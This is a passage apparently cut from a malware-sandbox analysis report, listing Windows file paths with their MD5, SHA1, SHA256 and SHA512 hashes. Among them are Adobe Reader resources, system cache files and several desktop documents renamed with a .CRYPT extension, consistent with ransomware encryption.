| SHA512 | e912b84e9b4856864d302154b68adf6822189aa78859265cf8f529279e77a9d7c086452b4527ebb75d9c910ad9a6a1e95e1f45498fc168628da80739acff742e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]
| MD5 | 8db5f9dff9d857a8827ea6d66fea4880 |
| SHA1 | ef5de087109543e49ee7fe70adb49efe27e15121 |
| SHA256 | e8c6ae3d3f05d53d58200db3f31383861d434c6abbf66f82e925321029058a10 |
| SHA512 | 70723910b4bf8814f848e10390378d53d9fb67e8a319edb708edc41b5c858c1d2cfc0b86a2909e33f72062df8b32e70554fa5ebe7aad7ec474ad78087560069b |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js
| MD5 | 4e6de5201d795432e75c0628dd306b26 |
| SHA1 | 80ae62145f6bc55c2a25f68ad9d6bc9fcae496db |
| SHA256 | 1265f683d27701f95b545e6201577fb4eadf5dcfbc1fc8cedb8dd39635515788 |
| SHA512 | 950227253fb845bd9a4519a209d72404760492473bda8101d846ded18aef1a2f6f6ab99b1b1b2186c0eed423c151c089316e124384f214644632e6a0f4dbece3 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css
| MD5 | 89728f1ec13231dd11d2ea20afe39d67 |
| SHA1 | b4350cd128350483be389b2c865633bd1ae0f78b |
| SHA256 | aff85e66d5b690dc0188f4c2348ca78abdc14605286128407242a4e91a684754 |
| SHA512 | 58203e9c3898367c78c6d10fa629c0bd2356b2ae54e225afbcee83be1d5d297977a5a9633e773ffc2b8079a6e2eb2aa0afc530c27d29f512af40d8c9ae539adb |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png
| MD5 | a93c09c1a326a8733b4eceb713ca7457 |
| SHA1 | 90ba7a4c24bb0d424abda46b736170ea3b43e541 |
| SHA256 | d03f54aaa9216f4e32053928ce87a317341232f107140c84f73b2b6490b5a81a |
| SHA512 | 432c3400257d00391baa255d32fd03e0b8c97231d684ef35534868a38bcbf9cb70b433eacfe154c25fd3376e69592a7000a823535700f353975572c5101a56af |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js
| MD5 | fc4cdc00064f47d2eedf58bd02068fe1 |
| SHA1 | cbb7157d8c560e9b2cdffac3a2b831202d76d2e6 |
| SHA256 | 0e8fb0e6e1dd239a2a1996059914a5ec5e753782527c1a07c62d808eb77df3e0 |
| SHA512 | 753d312596fdd24d3ad87b7916c5d108d185b42beff7c750099aecb38c7a321ff04260c19492d18cc27cf8f8843c6b3facde0934e67a46e9ce4291c3646abbe8 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ui-strings.js
| MD5 | c5596fa17e59cbf92a2ea2e1ad5c6f8b |
| SHA1 | 4153a71b5750685afba568403ed7522e83a9894f |
| SHA256 | 5812ebbc6311c0ff9919a27137b22435cbca3cb9fd56959b44ddb82f93609b99 |
| SHA512 | 762580962300f0e0501054450772ed59cdfec76d7aa6b1944f557ccd74ec2fcd171ffd67765f2b367c526d0193eabd184f0d4ac1dadb7a0d25f00f9866f670bc |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\ui-strings.js
| MD5 | 26645133c9de7799e35cee0e47b82ee0 |
| SHA1 | bb6be735f6814d765bbe6b3f3ce034d1767366c5 |
| SHA256 | 1180e5728ff28a49eec43c61f15d49541419e79397ae58479db67b533d292d36 |
| SHA512 | c466dc886b25fea5a0e16aec28a4e784afe797f3937c7863788d0e5fa41414346bb17546d49178a48815debcca50aec3acabadc1f508fe0a3207008bc722608e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png
| MD5 | cc62ce00dfbe76fd8affad9c89fced8c |
| SHA1 | 75d64cc57ff45a50c066f882bfd8e3845f8fa323 |
| SHA256 | e324ff224bfa2baf51d4ab75f686195a76b8c984676c450ed660eb9ca2b36f4e |
| SHA512 | 028056e42f0eb02646752b351bb04a6b9f87ff27a2e1060b4fe4d4867118fe90f42f555ea8c645361963405583005ec4f3802c7c57729fc8616df1af09cc94dd |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\ui-strings.js
| MD5 | fa904cdf440c6743078637992d58489f |
| SHA1 | 6969f407be2a1b52c5a41be256433026cabf9917 |
| SHA256 | 152f6d0325802be61521bff49a8dd07063feaffeb2447d3ae6f47adf214cbffb |
| SHA512 | c6237e56225d36d26ed594406a5bc08987bc34fac8d425dac8f909512ff19e6a27e1566651c591a38c0a5476e74dca09beb53ec15d4f08b6de2843fa064cbd3f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ui-strings.js
| MD5 | 573dd292166f86741bb965ee068c3793 |
| SHA1 | 169fcf0880c7a2c5993f5bf28ff64cd9ed441dd9 |
| SHA256 | ab2b7de642b66db6e6b610dab8fb3c94c972465e07b7f681127c40a6629d8c2e |
| SHA512 | 0217d582d827a7b6faa950bc726d41c4c7644ba11b19689b9e5eb60cf54df4afaefcf4eac3649e8315dc1134988dc71abcb94bd9a640829bf9d68a6ffa17241b |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js
| MD5 | 7adbce4bec815b574ab3fc6d85eb1937 |
| SHA1 | 7d14e52fc6aa5796996988e9feab97c31eab1e0b |
| SHA256 | efec14a7f219aff9e96c136933c0316abbabfa082b5755a86b2745c0a8423a79 |
| SHA512 | 4218fc7991ef7ab93b1fab696432fc0130f07c534b2da244ce3370e6092213db657505af8380e7a07576b16b19d7c1b58f6a5498122d73061a362162b31f5b18 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js
| MD5 | bf70043c03230a91bb5b402e7ee67e63 |
| SHA1 | 2ec8302c3ebe1e34abb5e0c813abceaadfc5073c |
| SHA256 | a8b45a4c0a3adae007e8ef6b3a0e9966d2ad0c552320210a778109e2799f6c75 |
| SHA512 | ecdf54cc56de9c49dec1e9e65aefa736201904e609474b13d089f188bf35ae46b62d1ba492f4c25ad3fd7ff584a1532be18c0115598c2deaa834b22e6e52a601 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\ui-strings.js
| MD5 | 478f0065e127108d705114b29fb9170a |
| SHA1 | 3d954983b0594275bdbe444336baad9517129b79 |
| SHA256 | 1beae6b25a652882189f27e3b52232bc3451a54eeedf3e5cb0eb827fe15032f9 |
| SHA512 | 4affd4e7c23c555d99a5a1a4ff929228af723961c6cc1c320358998fbba2528e2d84d5c64a5c28fd6420ba3132fad056f2388538086d061510d80e244f7b3990 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js
| MD5 | 661fea8b99a08e2422d8b5b9bcfd9921 |
| SHA1 | 54a78f38a3599aed6d27c6fc711d7af7a205c524 |
| SHA256 | 60624904ad10defbfcafa3acd5dac4c7c5040edde23bff489b6b32ea5a1403ad |
| SHA512 | 69b58c6c99f494ca1b6f2788cd17b63cc9f583b0abca870f666aedb9c504f660b03df699b69828c8ecc43a747297042eeca7e197de96dd43defb7871e2289b9c |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\ui-strings.js
| MD5 | 3dd77972f6558af4969a57eb4f19f2d0 |
| SHA1 | d56f6ebeaf408c667bb9491845a33ddc19d18947 |
| SHA256 | cde2dda4b1709d6591356e21717833ecf9802dc119d719e9dbbc97b090158644 |
| SHA512 | 68f15867e6b29cce5415ce31203cc3f1790869f85d1b1ba8b2912e9b1b570f61485e5e9aac96d9bcc069e81d298b56d8941cd94a1df72d07c7508c7fdcc7ef1b |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\ui-strings.js
| MD5 | 95e6ecbe44dc4ab34323c697c6568b56 |
| SHA1 | 0ca5debc2a7b53245ae6b7d6594ba93b3152bdee |
| SHA256 | d3bdbdce059d04ec6e336179e6262bc694def0fcc5fe4b006953dbf178dbb30c |
| SHA512 | af6262bf0a2b16fbd1dff7051eb0373336781c105b63631080ed2b6d38f54adbdbd16d794917fb9ad08c9ee238e0d4df732b7ef3e4c6d521a6b347eb8c2e9804 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\ui-strings.js
| MD5 | 4fcc8af63d8fea1581c1e96e9436e913 |
| SHA1 | 5c09be5c84dba1172a2503a3406223baed06f8bc |
| SHA256 | bbce03b612d22d42e40207a0ac4b6492ab0ad8c2cf4690377929f4cad738954d |
| SHA512 | 4bb1df7206f7fee79df361d678cd250399efff9d13d3435448170efd515abb425fcbf3b6ad9d0c6da1b4a7860d33dfd15daaa199e96dcdd701afb3b80234f2d6 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\ui-strings.js
| MD5 | 21a5d65fbcf76ed1b8e9489d3bb051f7 |
| SHA1 | dcfde89bb81642e0b1bcb2b4d8c0fe574e912950 |
| SHA256 | f054ff5e3f41e79c647bd03dc9ad1bad42f8292c7e7b839088faeb8abc182ff4 |
| SHA512 | 566bc1f2c5f4b2b9888c8e414552c25609d2562e10a8abddf6f036a6cbe2bc7644cbe850311224c25db96380c0e11fb07800f965305f41e068968bee530c320a |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js
| MD5 | 0e038344281f0aa0a74103dd77048888 |
| SHA1 | 163a5a2d3888eb23ecc17b53865742f3eb7aa3c1 |
| SHA256 | f3a76de64a79cd7afa5438bb0a4f4330a97497246fe00f7b29fb690e2ffe32cd |
| SHA512 | 5988b04142669c005728510cc0a0c7507a9b8561b9d3178e3ef06b77a725e5e3ab7c13faf2998522c601285e823d3f72edbe7b93ba6b14a9c5afefbacb974560 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\ui-strings.js
| MD5 | c4b091c93a4910ecfc619efdf3c56111 |
| SHA1 | 4147f571dfd1d77b6a6943c57784820bd0cba24c |
| SHA256 | d30e4139d68728b1c0b7c0fdccf649fc98c269f0d57c08e1d2033c13f162c29a |
| SHA512 | b276ec16ba3a0737c8958a7373c3b5b53d384432535e65ee5651dce90da0eaf7dad1a02479243efb0b5ea78234c0f423ebc10c82b6e28db557106b8a21db1964 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small.png
| MD5 | 65afdbfd57a964a5525ef68ca68cb5f4 |
| SHA1 | 986fd9886e54eaa35b90561c94b00f85eb758711 |
| SHA256 | 322fa7539ee1552758dbb051fe1199a7b4b247ec8335fb35cabf043d8947466d |
| SHA512 | 88b2d9c205d6fa4fb7823fa118fb95c651977cbaf1b54445ced380d34541e5367a218de4335a341b3994839386b487fcc33718b749ab2e05678ae87e0da1dbd7 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons.png
| MD5 | 2870d12e27e8a50bf66493145c06939a |
| SHA1 | f4319fc28ae1f99e359b5cfbd4c8c69af67dc03e |
| SHA256 | dd6fda1bd17d115065254a8af134a7906d8e15e2725b01223582c3add3240272 |
| SHA512 | 39b2281464998cd9f3d87659cdf7f3f2690a82bb8093ac64d5141d837dd4f951514cf0fcbfc02a0102f3d8ce780805886a361c649d6df2347db60b383442e5d0 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png
| MD5 | d1dfee6d7b14e63f64c349b2cae8ad27 |
| SHA1 | fd382215ff99c0993d8924f18ff7912b4835f4ad |
| SHA256 | b63bba00ed3b7a86b6ed36ab7d6eede57656454e0a583b875d34ee19466714e4 |
| SHA512 | 220e189bc67b20bef3f92da6dd063b12fd53436c6fa9e728553669e4d42dbe595c52801e68a929797c48dc56fa4ff47919aa3d065363ce881e207abc83f7de77 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png
| MD5 | 598b166da1d843121d50f9593073a15e |
| SHA1 | e41c87d8fa9aa263dfe783bdd692556fb8e24f43 |
| SHA256 | c46d21ff4c32097f172b4e99b5794374ed4a1cb025040d157f611f43929e98d5 |
| SHA512 | 107ceb56129c1baade5930cea77fdc9c53264ff06b92936a5823c483235ffce8ab4ca3efef5001c5cc16eb3351b663877e1e4184749ba33d785b4927fe2f2db1 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png
| MD5 | 48a2c150eaa7d9fe84e7e31163e67495 |
| SHA1 | cfd5375b61328af47b784d2e1229c95c9355ce06 |
| SHA256 | ff1d90818c6ec24ad8dc4334bed7e72b3ceb9460cdfe3b25ec24d2b31b4c9288 |
| SHA512 | e6abeeb5ed043270c9148b58fa359d8536e0a9606aaed86446f3cc3ef14a855b711a86869d02fe27f50ef79b91895c77bc970c6ccf962caeb8311984c4778410 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png
| MD5 | 34300ee4cd847a5329747c2294699c1f |
| SHA1 | 5e1086c8ebeaf9205517c82d8ae1711931ec48e1 |
| SHA256 | 122650bd6eea6dc3c3cde5c472c78fe200967b33c6e3f3d2f394d8fb66c3acfe |
| SHA512 | ecea239cb49cc1b9018e9d5bc34fa0d501cd9dc6bd7a8c01b8a2bfe9cb8d9baf805081d3705f0f986903a93a35a3ddcb852463bc2698606b556999cd0608ad6e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png
| MD5 | d82b1439dcd0ea62ce3edcf6d36eac1e |
| SHA1 | f5216b9a0c6b294584b24a5fd50b43e79d46310e |
| SHA256 | 44f25bfcbff16b8e7c81ac93d6dcbc312035c81ba6d62e61d4177e23ef62dbff |
| SHA512 | bc789786f1261ce50116190f56ce7da3063fb944af6e5da17fd0a61e51d3d25b11fc09a83d2fd1805e16f33c2c469bd28d05366b8fff7faa85d3dd498e5e3d1a |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png
| MD5 | 7d1b0ec51595563c9214ddfdec36f303 |
| SHA1 | bbb988973a8281943b5bfacb8ab03d97c0f0f398 |
| SHA256 | c915635ac032617e1acf87810abd8e8d9825c7e40a74245bc9efcf31d6da9da9 |
| SHA512 | 709deed649d6062cf8c1ada7207b9c871d51a69a4bc7dc3c1408bd6a38d211ff53ce19a091cc4bb68a62eb00aa512afd07a33d314393812716391f04faea93d3 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js
| MD5 | ac24e253ff384d8523af43f5a93688f7 |
| SHA1 | beb4ffa972185300803e9a1f6a16ec062cec1015 |
| SHA256 | f49327d72a4888fee8721962d13a94571e349ba666a0e1354c4f49331e858cff |
| SHA512 | 9c559a1bdaae9172fbe9e6a9b907390041fd16d0382a202423e0d9d19bb0f2c06a7228d6bc17df943d4e927c0420f302982e0463755bfd5c0d6e4ecb65504a61 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js
| MD5 | cb05ff26ffcb30838de16f659f8d93c9 |
| SHA1 | f9e977e1f60be49be8a17cf75d31f4a7620827ab |
| SHA256 | ef97178fce43f78773e1c57cebaadd55904a1e5d810f8f75219b23e92c00687d |
| SHA512 | 26fc3838e5ef5b638d974be02b6d8f76f7f4778b1b612ea9031c5a5b1cf4a421e48c7a667a1f8db55270c1c86c4e1ec469c8078dd0edaeec2df02fddff27a999 |
C:\ProgramData\Microsoft\Windows\Caches\{F337657F-5568-4EC8-923D-F92E0EB7EE39}.2.ver0x0000000000000001.db
| MD5 | 8b836d8d3ea988668ddae3311f514a57 |
| SHA1 | af3199496b831b74bde630f871615ce5848f9857 |
| SHA256 | ac944397bb7351bf439ea8b7e6cf5863fed078383f3da0b7c92b53408fe680d5 |
| SHA512 | f205183db25237a58c6a33b9c83af86df3210fc7cc411d4638af9c856fb39a2795c99d612601bdf183101402ed6455b7949a9deabfb2b2262afe47dff0c17cc2 |
C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\0f8e2cd5-b8eb-7a22-b9e9-9b1183fa0a84.xml
| MD5 | 29eb0301f92bda0d67f79582acadf847 |
| SHA1 | 2c2ac90238793f699322833c2f8bd043cc29ddec |
| SHA256 | 221ce3a8c269f4dff433a9a8a9807f65d8fa7b302e640b245f7293a0998363d6 |
| SHA512 | 61f47426e5dff09a432a7848f3d07cfb5f85cab6b327fb416c31223e6a5ecaaf3a3f065a6c4bf0a352fb4fd3c7199ae481c929c43da3d596000f87d7f6bd52c1 |
C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\bb26a0e5-d235-0ee6-0c36-6d5e185fa5b1.xml
| MD5 | 31434364acba2fa351fc9715db743df4 |
| SHA1 | 1c2e77b236cfdd14960e90c9a48e59532d1a255b |
| SHA256 | a94fc52f4840aa6390d47765d3fce16ab6d1c1978441156ef607a4b6f63fc317 |
| SHA512 | b069a65226c5aea8d50da2a179a351051a6680cf42a117d5d5b98e97bdcdd12e412f698b89039bd3464550e5794d3b95d97c6ee6931dc72e1bb060daa08e40b4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini
| MD5 | ace3165e852adb8aedbeda2aa3be570b |
| SHA1 | 4577ff7e92850e2723008f6c269129bd06d017ea |
| SHA256 | 237f73d46d3501de63eae1f85fdf37e65ddced70f013b7f178d1ee52b08f051f |
| SHA512 | cf77563b9295b191ce2f309e03618d1ab4d317f65b87dbecc4904ee2d058db06d23c20c199571b0fafb67ae5ec5166b76af0b7d8bfe3996b0dde9751e28f8c03 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db
| MD5 | c7c6abfa9cb508f7fc178d4045313a94 |
| SHA1 | 4f130f23896bd6d0e95f2a42b2cb83d17ac8f1a2 |
| SHA256 | 1bda9f0aed80857d43c9329457f28b1ca29f736a0c539901e1ba16a909eb07b4 |
| SHA512 | 9f1c1e438b8cceda02663a61a64c1c5fc6fb6238aa92d30e6d8d1a7b0cb29a8a6f26b63b9964ad876617f71ee7dc3c05205158c4ed4be327149652b1c6900825 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.3.db
| MD5 | 4534f12102d235344cf8dda748f0cabf |
| SHA1 | 7db67baceeecb3a420bf37a7beca4a45185f8f3c |
| SHA256 | 1bd4db450abc8914c2fac721cace2704ff4c16028e6d07293154dad289835694 |
| SHA512 | 7b4dacdbc6a2fccdd3818eb41b7fa23eeec51f333af0e842d9185c7ae45eba1623369b1caa27b824cba10c4cd6a2cdbf7f127ab2c6f7656eedce5fe25a0b84a2 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{e2b8b059-2290-4735-a51e-04a2d858724a}\0.1.filtertrie.intermediate.txt
| MD5 | f6a6263167c92de8644ac998b3c4e4d1 |
| SHA1 | c1fe3a7b487f66a6ac8c7e4794bc55c31b0ef403 |
| SHA256 | 11770b3ea657fe68cba19675143e4715c8de9d763d3c21a85af6b7513d43997d |
| SHA512 | 232d43e52834558e9457b0901ee65c86196bf8777c8ff4fc61fdd5e69fd1d24f964fed1bf481b6ef52a69d17372554fecb098fb07f839e64916bdd0d2abf018a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db
| MD5 | 794e3946d02095ca5a7174cc1c5c3ad7 |
| SHA1 | d0d869fc4814041604f05c1819dbaede5897c3d8 |
| SHA256 | dcfcb4fb798556493cb1ee43012f501b2d1fd16b63aa163fe8117c359b9ff131 |
| SHA512 | 1d2f06e2e640eb5fccc7762196a06a92aecdb880f9cc9d2c0a6f72cc654b549c896cba8d09a23f8571073c89c17ddde27db60d9223ba9bda11776c1d89a8e08a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 061ce6fe66cc378b312f2173e6146e32 |
| SHA1 | 00e8fcc73c8309ee97342750cd5a73287744299a |
| SHA256 | a2e5ca1818a970102b678fcbf4e098f845d269baa785d9a9d200de0cca56e92b |
| SHA512 | c9133fc6ee8f9ae517da08306a7abd3cb855f594a3e7ef89815e0635380d28a8c9c97fc592a8d1b80798d84c4bc48f531f09fd0ebe3b471a6e3880ac482fd4a9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db
| MD5 | c54cde3ceede65db57e1ef09429038d6 |
| SHA1 | d40df43ca2538ba8f23eb8d5e6ba48c6cd1a29a7 |
| SHA256 | 80a0bcaaf774d79edb86f7cf3793bb8d584f3b74a67112b7b7b651aa762240eb |
| SHA512 | 1677ee5d05e7357550bf0b45d5f077557e3835d066ac930692112c69c4719a4f618af33f8531b9b99f202d3e69716e2f53faa7da0c8092ffa22a43b585777f2b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 0150b46ed17d8afad43443d983cd3ea7 |
| SHA1 | b508398f95127bdf4dc10a647751d6d1b6c4e985 |
| SHA256 | e6e6f2088fac30d468f6358f2974993f54914c770ced0a7dff8f0083654ab590 |
| SHA512 | d0fdc4482f7c077d96d49afedce04f74a34dd7841d8ce40d306dceae896a642cc56b65ee1843635cb5d9ca7efae0a2185c820899555133d59d91d991872ef3fe |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db
| MD5 | ae6fbded57f9f7d048b95468ddee47ca |
| SHA1 | c4473ea845be2fb5d28a61efd72f19d74d5fc82e |
| SHA256 | d3c9d1ff7b54b653c6a1125cac49f52070338a2dd271817bba8853e99c0f33a9 |
| SHA512 | f119d5ad9162f0f5d376e03a9ea15e30658780e18dd86e81812dda8ddf59addd1daa0706b2f5486df8f17429c2c60aa05d4f041a2082fd2ec6ea8cc9469fade3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{03BA58C4-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.CRYPT
| MD5 | 18702d4f8877ad2e936a4284dd428e59 |
| SHA1 | 8a919f584eda5611e49fe1d1102713246f3da236 |
| SHA256 | 1d1b62f7111bf53a9eda4bcf68c98e7e026fbb7c03fa2577d11ef8437d4189ef |
| SHA512 | 9fff0d6620a28749f02c90ed1fbd5ec5515d1575e12410f65b40beebbd4312daf3e12c00c13f8e3774e62432943bfc0a6f939d8892b54c2049c3272df83aa6cf |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat
| MD5 | 2ee8f59b7211eeda18023f0202f0e55d |
| SHA1 | 840921d8e124bf233db3969d04ef3911d5a87503 |
| SHA256 | 8dd07eefa59b6e85934c9fc5af24ef3cc414dad04b3b03792d348a32d5c23a75 |
| SHA512 | ea44c1f912625c0b522ec54c3e64233b08123088e9caf77a6e563e02403545b2ad13fe96ad5739bce1b54cb57930eb913fbcdb4f2b17889ee45fbe769ad5bd9a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | c40e417829c7873578be9dc87c904cf7 |
| SHA1 | 295f131b8db3401025523f48ae8af4e121f20123 |
| SHA256 | bbb76aec5e68f131eba7b7ae21e81e182c39d5dfcc4ad615c799b2a2372c8461 |
| SHA512 | b0182d595d49dbdac4bba6d599de1ebcdc4f93ef7f797dc7ec8295295ff6f9ccebfce160181ad2ae5ae4f1e36e65a8af49c79a8280b50e22ae84567656723d82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db
| MD5 | 72ef40c1915afb3e7ef638c512a7579f |
| SHA1 | 616180f75ee011973c4254e4a280dc942a0cd678 |
| SHA256 | 1d86639508717d445c88d742e12143e51679bded592bf878a0164ef04aba67b1 |
| SHA512 | 09b8a61cd5a63ba9050ff61b7dfdcdc92da29dad692e11c1c70d6e181cd65e38a6b815766fce5d2d35f165b4c1fbe0d8f573173e0a724d887f7b58ac2cb4ecad |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 392e428700fd6c73548d596d25f86d17 |
| SHA1 | 95821fc7c16f3702440baae6b441a73fc23e2b6d |
| SHA256 | 5732cbc8637d933a31ac6ea8437d799423d269a711f214985e005f4f4d21ebbf |
| SHA512 | c4c9d9ea800025686390cee626854b7f5b62c0c7e82678b8c655bd35ffe46bca0cc5ce628a8955b89983af51664be2e508df3c2e41b4b59e72c22a3fe05956a4 |
C:\USERS\ADMIN\DESKTOP\REDOSEND.XLSX.CRYPT
| MD5 | 3e7c6a1a31198245395cb0390a804843 |
| SHA1 | e1a65025b78b01ee54640330ecd573db2b91510e |
| SHA256 | 9974fa3b2e1a4f2ba8f3aea1cc3e5cca87abbe8c8339cf3cdcc7dd4c279d3b05 |
| SHA512 | 7d1ba6357f79e2faefea29e300a2d8e0d4b647a358005b6fb6374280303a124469c6eea76531d6c01c7e66a9730d2a4b48d127b5fa4297917c77aa3d042a98a8 |
C:\USERS\ADMIN\DESKTOP\UNINSTALLEXPORT.TIF.CRYPT
| MD5 | ece3714113de91af4fa2429db4334726 |
| SHA1 | 66c121ef204ae50c287170c27776960305fca41d |
| SHA256 | 1733aa5c08f00c79714a5ac22758407427379ff00eab275024b3531ef159a9d5 |
| SHA512 | 778c0abcb54c56d29fa99b70d3d88ca985ad5059a9d6d041edeb5dd0e4e94975e84751db84172db3436028c87c32d7b6932df6322d31270a7b2e6bab11bbbd8f |
C:\USERS\ADMIN\DESKTOP\SUBMITINITIALIZE.XLSX.CRYPT
| MD5 | 346fb3ba575d343334f26e752c6191ad |
| SHA1 | 18de794fb71adf24cfe41fb937f2e3ab41bc7f4a |
| SHA256 | 12afae26f1d0ba5a3aad408a2df474f2c0e9336a959c51d328c9584809e8faea |
| SHA512 | 47d76b561a3dd4812f79d61388383f812877777da65ab506bef0a186c1d181671cc49244470175d6a46e6b2499181d7628baff757c335e2f4242eb8257527254 |
C:\USERS\ADMIN\DESKTOP\SHOWCOMPRESS.DWG.CRYPT
| MD5 | 162248efc633a4124c22b2d6e70b1903 |
| SHA1 | 93bb80672291b80ae06ee8402c52fc856f29b63a |
| SHA256 | 52cd49adabd9ec0f18da26f32a351172c90761e9167037f65e15eeafcb928ce4 |
| SHA512 | bc99c314b2fbad70ab01e668635814fed0834736c8479296aefd3b9895f5d9d114dcefb027df5b0287bd7e8538bbbe1530305cec124005d019ece3ef13d7c78b |
C:\USERS\ADMIN\DESKTOP\RESUMEPING.DOCX.CRYPT
| MD5 | 4d09842e882b144c3f81298b879d2dcb |
| SHA1 | 26b6a379e781f728c38e348124528a0c705d6760 |
| SHA256 | c6ef200ee87e574ac4fc204fdeb43ae36eb296eafd3f3abeab33de923bf45e1c |
| SHA512 | 855281712a9d7b6c5332825ef370d21e91877e0b6387a55a1266342003bd11410b4fdff99b0a3a90e4b6b25362b557695e3ed1a804e5f6c596636889ffce6ead |
C:\USERS\ADMIN\DESKTOP\REQUESTGRANT.DOCX.CRYPT
| MD5 | aedcf971db9f42c48a7c60ba2d5cfd7c |
| SHA1 | a7c237fb1795158698c8e3cce04c8e5526b3e8f1 |
| SHA256 | 3ec5167148f8456ebbbccf1a06af91c7fb91f0eaa067b6dd51309076252662f0 |
| SHA512 | f98eb4863c87a771b22477ccba5f242cfd304cd8bef25bb7bac11bb7b6a0c5df1c7bbeaf16e559c1366ddb5de3b817a8a05b8702c1db9c01c954853614f05765 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db
| MD5 | d6463e79fee89ce8f669ff371a8be181 |
| SHA1 | 2aafe905430acb59d09ad4dfa646e6fdec868f12 |
| SHA256 | 429d4da80e7baf36c0d1df95ed5ed12fe870a2d5e6cf3f07014b0a762fc10849 |
| SHA512 | 4e7947e8319842c8393355bf177a874054a7088eac46730f6b3f65c87d2b2bf3bf57ee92d9ba5507618a8dad07d8f8aec0dd6acb468ef29905ac42656afe964e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
